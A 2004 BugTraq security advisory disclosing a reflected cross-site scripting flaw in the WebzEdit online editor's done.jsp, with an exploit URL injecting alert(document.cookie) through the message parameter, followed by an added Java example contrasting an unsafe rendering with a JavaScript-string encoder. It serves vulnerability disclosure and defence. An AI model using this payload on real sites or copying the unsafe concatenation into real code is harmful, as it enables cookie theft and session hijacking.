BugTraq
Cross Site Scripting in WebzEdit
Feb 21 2004 03:13PM
Cheng Peng Su (apple_soup msn com)
Title: Cross Site Scripting in WebzEdit
Release Date: Feb 22, 2004
Application: WebzEdit
Version Affected: 1.9 or lower
Platform: JSP
Severity: Low
Discover: Cheng Peng Su(apple_soup[at]msn.com)
Vendor URL: http://www.freewebs.com/
################################################
Intro:
WebzEdit is a tool to edit web pages online.
Proof Of Concept:
This page (http://host/WebzEdit/done.jsp?message=index.htm%20has%20been%20saved.) will show you a message box with "index.htm has been saved.", and [done.jsp] doesn't filter out illegal characters.
So here is an XSS vuln:
URL:http://host/WebzEdit/done.jsp?message=');[XSS code];a=escape('
Exploit:
URL:http://host/WebzEdit/done.jsp?message=');alert(document.cookie);a=escape('
----------------------------------------------------------
Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University,
Wuhan,Hubei,China
email:apple_soup[at]msn.com
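
An added example, not part of the original post and not WebzEdit's own code: a Java encoder for the JavaScript-string context the advisory describes, shown beside the unencoded form. The template `alert('...')`, the class name and the method names are assumptions, since the source of done.jsp is not shown in the advisory.

```java
// Added example: hypothetical reconstruction of how done.jsp might embed the
// "message" parameter, with an output encoder for the JavaScript-string context.
public class DoneMessageEncoder {

    // Encode untrusted text for use inside a quoted JavaScript string literal
    // in an HTML <script> block. Letters and digits pass through; every other
    // character becomes \xHH or \uHHHH, so quotes, parentheses, backslashes
    // and "</script>" cannot end the string or the script element.
    static String forJsString(String input) {
        if (input == null) return "";
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            boolean alnum = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                         || (c >= '0' && c <= '9');
            if (alnum) out.append(c);
            else if (c < 0x100) out.append(String.format("\\x%02X", (int) c));
            else out.append(String.format("\\u%04X", (int) c));
        }
        return out.toString();
    }

    // Assumed vulnerable pattern: the parameter is concatenated as-is.
    static String renderUnsafe(String message) {
        return "<script>alert('" + message + "');</script>";
    }

    // Same template with the parameter encoded for its output context.
    static String renderSafe(String message) {
        return "<script>alert('" + forJsString(message) + "');</script>";
    }

    public static void main(String[] args) {
        String[] samples = {
            "index.htm has been saved.",            // benign value from the advisory
            "');alert(document.cookie);a=escape('"  // decoded value from the advisory's URL
        };
        for (String s : samples) {
            System.out.println("unsafe: " + renderUnsafe(s));
            System.out.println("safe:   " + renderSafe(s));
        }
    }
}
```

With the second sample, the unencoded output contains three separate statements, while the encoded output remains a single string literal passed to `alert`.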